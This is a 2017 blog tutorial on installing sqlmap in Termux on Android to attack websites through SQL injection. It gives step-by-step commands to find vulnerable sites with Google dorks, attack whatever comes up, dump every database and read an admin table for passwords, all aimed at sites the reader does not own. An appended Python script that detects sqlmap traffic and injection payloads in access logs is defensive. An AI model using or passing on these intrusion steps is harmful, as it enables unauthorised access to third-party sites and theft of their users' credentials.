
Wednesday, 20 December 2017

How To Hack Website Using Android Without Root (SQLMAP Tutorial & Installation)

You can first watch the video on how to install sqlmap for SQL injection in Termux (Android, with or without root); it is also available on YouTube.

Our hacking YouTube channel: https://www.youtube.com/c/vknarola

Hello everyone. Today I am going to show you how to install SQLMAP on Android without root permission and hack a website with SQL injection. sqlmap is designed for Linux, and it is based on some basic SQL injection vulnerabilities such as blind, time-based and error-based. I personally found out this trick and brought it to you guys! 😛 This works on non-rooted phones and it won’t need much space to install; hardly 20 MB is needed. It also doesn’t need any Linux distro or other heavy files, so you can use it on small phones. I have personally tested it on many non-rooted phones, and it works fine. The basic thing you need is a brain 😛 and nothing else. I won’t waste any more of your precious time.
So let’s start!

Requirements 

  • Termux (a Linux terminal containing many built-in commands)
  • sqlmap (the most important part, used for SQL injection)
  • File manager (to view the log and database)
  • Patience and a brain 😛

SQLMAP On Android : Installation

  • First install all the apps from the link above and run each at least once. Download the sqlmap zip file, extract it to the sdcard and change its name.
  • After that, open Termux and run the given command:
      apt update && apt upgrade
  • The update takes some time. It will tell you that some space is required and ask whether you want to install; simply press y for yes. It takes only a small amount of space.
  • If your phone runs Android 6 or later, you need to run this command. On a lower version you can skip it, as it is not mandatory, but I suggest you run it:
      termux-setup-storage
  • It will ask you to allow permission to use your internal storage. Just hit the Allow button and go to the next step:
      packages install python2
  • This command installs Python in your Termux. It asks whether you want to install; enter y to install python2.

Let’s Start

  • Now everything is set. You need to find sqlmap.py on your phone and navigate to it using cd. First go to the root folder:
      cd /
    Then type:
      cd sdcard
      ls
  • It will show you all the files. Now find sqlmap-master (the extracted folder) and enter it two times:
      cd sqlmap-master
      cd sqlmap-master
  • If you have already changed the name of sqlmap-master to sqlmap, run instead:
      cd sqlmap
      cd sqlmap-master
  • You can use the “ls” command to list all the files in the current location.
  • Once you are in the sqlmap-master folder where sqlmap.py is stored, run sqlmap with the following command:
      python2 sqlmap.py
  • If you see the sqlmap banner in red, the installation is done. The next step is hacking the website using sqlmap. You need to find a website with an SQL vulnerability, or you can use the simple method of sqlmap’s built-in Google dork option to find a website.
  • If you are using a Google dork:
      python2 sqlmap.py -g your_keyword
  • If you want to use a direct URL:
      python2 sqlmap.py -u your_url
  • You can refer to the official sqlmap site for help, or type python2 sqlmap.py -h for basic help and python2 sqlmap.py -hh for advanced help.
  • If you want to hack the whole site with all databases and tables, add -a to python2 sqlmap.py -g your_keyword or to python2 sqlmap.py -u your_url.
  • With the Google dork method it gives you three options: type “y” to attack the first site that comes up in the results, “n” to skip to the next target, and “q” to quit.

Get Set Attack!

  • After that it will start attacking the site. Wait until it finishes. It may ask you questions along the way; simply hit “y”.
  • After that it will show you many tables and everything that sqlmap hacked. Don’t worry, you can view it all in the log when the process is done.
  • Now, if you want to see all the tables, run the following command:
      python2 sqlmap.py -u url --tables
  • It will return the names of all the tables already hacked by sqlmap. Choose the table you want to view by entering the following command. In my case I want to view the admin table to see the password, so I run:
      python2 sqlmap.py -u url -T your_table_name
  • This command saves your table data and log file in the root folder, which is not accessible on a normal non-rooted phone. No worry, we have a solution: the terminal can access it, so we copy the files to internal storage to view them on a non-rooted phone as well:
      cp source //sdcard
  • Replace source in the command above with the source path given by the terminal. It will omit the dump file, but don’t worry, we don’t need it. Now navigate to the file using your built-in file manager or ES file manager.

  • Congrats! You successfully hacked a website using sqlmap with SQL injection on Android.
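
From the defending side, the scan this tutorial runs leaves a recognisable trail in the target's web-server access log. The following added example (not part of the original post) flags sqlmap's default User-Agent and classifies the blind, time-based and error-based payload shapes named in the introduction. The log lines, IP addresses, version string and rule names are constructed assumptions.

```python
import re
from urllib.parse import urlsplit, unquote_plus

# Constructed sample lines in combined log format; not real traffic.
SAMPLE_LOG = [
    '203.0.113.7 - - [20/Dec/2017:10:01:02 +0000] "GET /article.php?id=5 HTTP/1.1" '
    '200 5120 "-" "Mozilla/5.0 (Linux; Android 7.0)"',
    '203.0.113.9 - - [20/Dec/2017:10:02:10 +0000] "GET /article.php?id=5%20AND%201%3D1 HTTP/1.1" '
    '200 5120 "-" "sqlmap/1.1.12#stable (http://sqlmap.org)"',
    '203.0.113.9 - - [20/Dec/2017:10:02:11 +0000] "GET /article.php?id=5%20AND%20SLEEP(5) HTTP/1.1" '
    '200 5120 "-" "sqlmap/1.1.12#stable (http://sqlmap.org)"',
    '198.51.100.4 - - [20/Dec/2017:10:05:40 +0000] '
    '"GET /article.php?id=5%20AND%20EXTRACTVALUE(1%2CCONCAT(0x5c%2CVERSION())) HTTP/1.1" '
    '500 310 "-" "Mozilla/5.0 (Linux; Android 7.0)"',
]

# ip, method, request target, status, user agent
LINE = re.compile(
    r'^(\S+) \S+ \S+ \[[^\]]+\] "(\S+) (\S+) [^"]*" (\d{3}) \S+ "[^"]*" "([^"]*)"$'
)

# One rule per injection technique the tutorial names (rule names are ours).
RULES = {
    "time-based": re.compile(r"\b(sleep|benchmark|pg_sleep)\s*\(|waitfor\s+delay", re.I),
    "error-based": re.compile(r"\b(extractvalue|updatexml)\s*\(", re.I),
    "boolean-blind": re.compile(r"\b(and|or)\s+\d+\s*=\s*\d+", re.I),
}

def scan(lines):
    """Return (client_ip, path, tags) for every request that trips a rule."""
    findings = []
    for line in lines:
        m = LINE.match(line)
        if not m:
            continue  # not combined log format; skip rather than guess
        ip, _method, target, _status, agent = m.groups()
        parts = urlsplit(target)
        query = unquote_plus(parts.query)  # decode %20, %3D, + before matching
        tags = [name for name, rx in RULES.items() if rx.search(query)]
        if agent.lower().startswith("sqlmap/"):
            tags.append("sqlmap-user-agent")  # sqlmap's default User-Agent prefix
        if tags:
            findings.append((ip, parts.path, tags))
    return findings

if __name__ == "__main__":
    for ip, path, tags in scan(SAMPLE_LOG):
        print(ip, path, ",".join(tags))
```

The payload rules still fire on the last sample line even though its User-Agent is an ordinary browser string, which is why the two signals are kept separate.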

Dorks

I’m giving below some important dorks here, so you can find SQL vulnerable sites easily!
